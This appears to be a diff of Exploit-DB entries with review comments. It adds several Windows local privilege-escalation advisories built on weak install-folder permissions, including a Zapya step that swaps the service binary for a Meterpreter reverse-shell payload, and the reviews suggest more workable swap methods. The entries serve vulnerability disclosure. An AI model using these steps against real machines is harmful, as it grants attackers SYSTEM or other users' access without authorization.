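Review bot: `trg = dom[14]` ties the testcase to the exact element count of this page. `dom` is a live getElementsByTagName("*") collection, and counting html, head, the five meta tags, style, the two script elements, title, body, the two iframes, the appended hr and the appended audio, index 14 is the hr until `document.getElementById("e1").removeNode(true)` shifts everything down and lands it on the audio element, so adding or dropping one head element (the empty `<script type='text/javascript'></script>`, say) moves the `DOMNodeRemoved` listener to a different node. `e` still refers to the created audio element at that point, so `trg = e` (or an `id` on the element) selects the same target without the counting and survives minimisation. Smaller points: `e`, `rf` and `dom` are assigned without `var` and leak as globals, the file closes with two `</html>` tags, and in the style block `font-color` is not a CSS property (`color` is) and the `};` after the rule is junk; none of that changes the crash, which the WinDbg transcript in the header shows reaching the freed object through `CMediaElement::RemoveFromPlayToElementTracker` from `CMediaElement::Shutdown` during `CMarkup::TearDownMarkup` on the `location.reload()`.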
59
platforms/windows/local/40362.txt
Executable file

@ -0,0 +1,59 @@
# Exploit Title: Battle.Net 1.5.0.7963 Local Privilege Escalation
# Date: 11/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: www.battle.net
# Software Link: https://eu.battle.net/account/download/
# Version: Version 1.5.0.7963
# Tested on: Windows 10 Professional x64 and Windows XP SP3 x86


1. Description:

Battle.Net installs by default to "C:\Program Files (x86)\Battle.Net" with weak folder permissions granting any built-in user account with full permission to the contents of

the directory and it's subfolders. This allows an attacker opportunity for their own code execution under any other user running the application. This is not limited to just

the Battle.Net directory, but also to any of Blizzards game installation folders as installed by Battle.Net.

2. Proof

C:\Program Files>cacls Battle.net
C:\Program Files\Battle.net BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F


C:\Program Files>cacls "Diablo III"
C:\Program Files\Diablo III BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F


C:\Program Files>cacls "StarCraft II"
C:\Program Files\StarCraft II BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F


C:\Program Files>cacls Hearthstone
C:\Program Files\Hearthstone BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F


C:\Program Files>cacls "Heroes of the Storm"
C:\Program Files\Heroes of the Storm BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F

C:\Program Files (x86)>cacls "World of Warcraft"
C:\Program Files (x86)\World of Warcraft BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F

3. Exploit:

Simply replace any of the game exe's or any of the dll's with your preferred payload and wait for execution.

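Review bot: the description gives the install path as "C:\Program Files (x86)\Battle.Net", but five of the six `cacls` listings in section 2 are taken from `C:\Program Files>` and only "World of Warcraft" from `C:\Program Files (x86)>`; with two test hosts named in the header (Windows 10 x64 and XP SP3 x86) the reader cannot tell which listing came from which machine, so label them. The impact wording also overstates the result: no service or scheduled task is shown, so a replaced game exe or dll runs only when another user (an administrator, in the interesting case) next launches that game, which is code execution as that user on their schedule rather than a guaranteed elevation; say so, and name the directory that holds the binaries the launcher actually starts so the reader knows which file to swap. Minor: "it's subfolders" should read "its subfolders" and "Blizzards" needs its apostrophe.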
27
platforms/windows/local/40365.txt
Executable file

@ -0,0 +1,27 @@
# Exploit Title: Zapya Desktop Version ('ZapyaService.exe') Privilege Escalation
# Date: 2016/9/12
# Exploit Author: Arash Khazaei
# Vendor Homepage: http://www.izapya.com/
# Software Link: http://binaries.izapya.com/Izapya/Windows_PC/ZapyaSetup_1803_en.exe
# Version: 1.803 (Latest)
# Tested on: Windows 7 Professional X86 - Windows 10 Pro X64
# CVE : N/A

======================
# Description :
# Zapya is a 100% free tool for sharing files across devices like Android, iPhone, iPad, Window’s Phone, PC, and Mac computers in an instant.
# It’s Easy to use and supports multiple languages. We are already a community of 300 million strong users and growing rapidly.
# When You Install Zapya Desktop , Zapya Will Install A Service Named ZapyaService.exe And It's Placed In Zapya Installation Directory .
# If We Replace The ZapyaService.exe File With A Malicious Executable File It Will Execute As NT/SYSTEM User Privilege.
======================

# Proof Of Concept :
# 1- Install Zapya Desktop .
# 2- Generate A Meterpreter Executable Payload .
# 3- Stop Service And Replace It With ZapyaService.exe With Exact Name.
# 4- Listen Handler For Connection And Start Service Again or Open Zapya Desktop , Application Will Attempt To Start Service
# 5- After Starting Service We Have Reverse Meterpreter Shell With NT/SYSTEM Privilege.

==================
# Discovered By Arash Khazaei
==================
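Review bot: the advisory asserts that ZapyaService.exe runs as SYSTEM and that a normal user can swap the file, but neither is shown: there is no `icacls` listing of the installation directory and no `sc qc ZapyaService` / `sc sdshow` output for the service account and its DACL, so the two facts that make this an escalation are taken on trust. Step 3, "Stop Service And Replace It", also assumes the unprivileged user can stop the service, which the default service security descriptor does not grant; if the directory ACL is the real weakness, the workable path is to rename the running ZapyaService.exe (a mapped image cannot be overwritten but can be renamed where the directory allows delete), place the payload under the original name and wait for the next service start, which is what step 4's "Open Zapya Desktop, Application Will Attempt To Start Service" hints at without saying how a non-admin triggers it. Add the ACL and service-configuration listings and reword steps 3 and 4 around what the unprivileged user can actually do.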
41
platforms/windows/local/40375.txt
Executable file

@ -0,0 +1,41 @@
# Exploit Title: WinSMS 3.43 Local Privilege Escalation
# Date: 13/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: http://www.winsms.co.za
# Software Link: https://www.winsms.co.za/products/bulk-sms-desktop-software/
# Version: Software Version 3.43, Released September 2015
# Tested on: Windows 10 Professional x64 and Windows XP SP3 x86


1. Description:

WinSMS installs by default to "C:\Program Files (x86)\WinSMS" with very weak folder permissions granting any user full permission to the contents of the directory and it's subfolders. This allows ample opportunity for code execution against any other user running the application. WinSMS is typically configured as a startup program which makes this particularly easy to take leverage.

2. Proof

C:\Program Files>cacls WinSMS
C:\Program Files\WinSMS Everyone:(OI)(CI)F
BUILTIN\Users:R
BUILTIN\Users:(OI)(CI)(IO)(special access:)
GENERIC_READ
GENERIC_EXECUTE
BUILTIN\Power Users:C
BUILTIN\Power Users:(OI)(CI)(IO)C
BUILTIN\Administrators:F
BUILTIN\Administrators:(OI)(CI)(IO)F
NT AUTHORITY\SYSTEM:F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)F
TULPA-842269BBB\Administrator:F
CREATOR OWNER:(OI)(CI)(IO)F


3. Exploit:

Simply replace WinSMS.exe or any of the dll's with your preferred payload and wait for execution.

4. Plain Text Password Disclosure:

It is worth noting that sensitive information such as the proxy server password is stored in plain text within the a database file located at "C:\Program Files (x86)\WinSMS\WinSMS.mdb"

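Review bot: the `cacls` output supports the "any user full permission" claim (Everyone:(OI)(CI)F on the directory), but section 4 does not support its own: "stored in plain text within ... WinSMS.mdb" comes with no excerpt, table or field name, or even a `findstr`/`strings` hit, so nothing in the advisory lets a reader reproduce it; add the evidence or drop the section. The `BUILTIN\Power Users:C` and `TULPA-842269BBB\Administrator:F` entries look like the XP SP3 host's Program Files ACL, which would explain why the prompt is `C:\Program Files>` while the description says `C:\Program Files (x86)`; say which host the listing is from and add the Windows 10 one, since that is where the claim matters. Also spell out what is gained: WinSMS "is typically configured as a startup program", so a replaced WinSMS.exe runs as whichever user logs in next, which is execution in that user's context (an administrator if one uses the machine), not SYSTEM. Minor: "it's subfolders" should read "its subfolders", "easy to take leverage" should read "easy to leverage", and "within the a database file" has a stray article.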
69
platforms/windows/local/40376.txt
Executable file

@ -0,0 +1,69 @@
# Exploit Title: Multiple Icecream Apps Local Privilege Escalation
# Date: 13/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: icecreamapps.com
# Software Versions Affected: Icecream Ebook Reader 4.21 | Icecream Screen Recorder 4.21 | Icecream Screen Recorder 2.12
# Software Link: http://icecreamapps.com/Ebook-Reader/ | http://icecreamapps.com/Screen-Recorder/ | http://icecreamapps.com/Slideshow-Maker/
# Tested on: Windows 10 Professional x64 and Windows XP SP3 x86


1. Description:

The default installation directory for Icecream Ebook Reader is "C:\Program Files (x86)\Icecream Ebook Reader" with weak folder permissions that grants EVERYONE change/modify

privileges to the contents of the directory and it's subfolders. This allows an attacker opportunity for their own code execution under any other user running the

application. The same vulnerability exists for "Icecream Screen Recorder" as well as "Icecream Slideshow Maker".

2. Proof

C:\Program Files (x86)>icacls "Icecream Ebook Reader"
Icecream Ebook Reader Everyone:(OI)(CI)(M)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)

C:\Program Files (x86)>icacls "Icecream Screen Recorder"
Icecream Screen Recorder Everyone:(OI)(CI)(M)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)

C:\Program Files\Icecream Slideshow Maker Everyone:(OI)(CI)C
BUILTIN\Users:R
BUILTIN\Users:(OI)(CI)(IO)(special access:)
GENERIC_READ
GENERIC_EXECUTE
BUILTIN\Power Users:C
BUILTIN\Power Users:(OI)(CI)(IO)C
BUILTIN\Administrators:F
BUILTIN\Administrators:(OI)(CI)(IO)F
NT AUTHORITY\SYSTEM:F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)F
TULPA-842269BBB\Administrator:F
CREATOR OWNER:(OI)(CI)(IO)F



3. Exploit:

Simply replace any of the application exe's or any of the dll's with your preferred payload and wait for execution.

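Review bot: the version header names "Icecream Screen Recorder" twice ("Icecream Screen Recorder 4.21 | Icecream Screen Recorder 2.12") while the description, the third software link and the third ACL listing are about "Icecream Slideshow Maker", so the second entry's product name is wrong and no Slideshow Maker version is actually recorded. The third listing is also pasted without its command line: the first two start with `C:\Program Files (x86)>icacls ...` in icacls format, this one begins at `C:\Program Files\Icecream Slideshow Maker Everyone:(OI)(CI)C` in cacls format and, judging by the `BUILTIN\Power Users:C` and `TULPA-842269BBB\Administrator:F` entries, comes from the XP SP3 host; say which tool and host produced each listing. The `(M)` and `C` entries do match the description's "change/modify privileges" and are enough to replace the binaries, but, as with the other advisories in this batch, state that the payload runs only when another user launches the application, since no service is involved. Minor: "it's subfolders" should read "its subfolders" and "permissions that grants" should read "permissions that grant".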
@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/1976/info

Windows Media Player is an application used for digital audio, and video content viewing.

It is possible for a user running Windows Media Player 7 to enable a skin (.wms) file and unknowingly execute an embedded malicious script. When a user attempts to retrieve a skin (.wms) file it is downloaded and resides on the user's local machine. If Windows Media Player is run with the malicious skin enabled, the Active X component would allow any arbitrary action to be achieved. Depending on internet security settings this vulnerability is also exploitable if the skin file in question resides on a web site. The script could automatically launch when a user visits the web site.

Execution of arbitrary scripts could make it possible for the malicious host to gain rights equivalent to those of the current user.

https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20424.zip
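Review bot: this hunk deletes the whole text of the Windows Media Player 7 '.wms' skin entry, the BID 1976 summary and the pointer to sploits/20424.zip included, and nothing in the hunk records where that entry now lives; the rendered diff has also lost the file path line for the deletion. If the entry is being re-filed under a new path, the replacement file belongs in the same change, and if it is being retired the commit message should say why, otherwise the archive link is left without the description that explains what it contains.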
@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7539/info

Internet Explorer is reported to be vulnerable to a zone bypass issue. Allegedly, if Internet Explorer attempts to open a web page containing numerous 'file://' requests each contained in a separate Iframe, the requested file will eventually be executed in the Local Computer zone.

https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22575.rar
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22575.rar (dmz.rar Password: zones)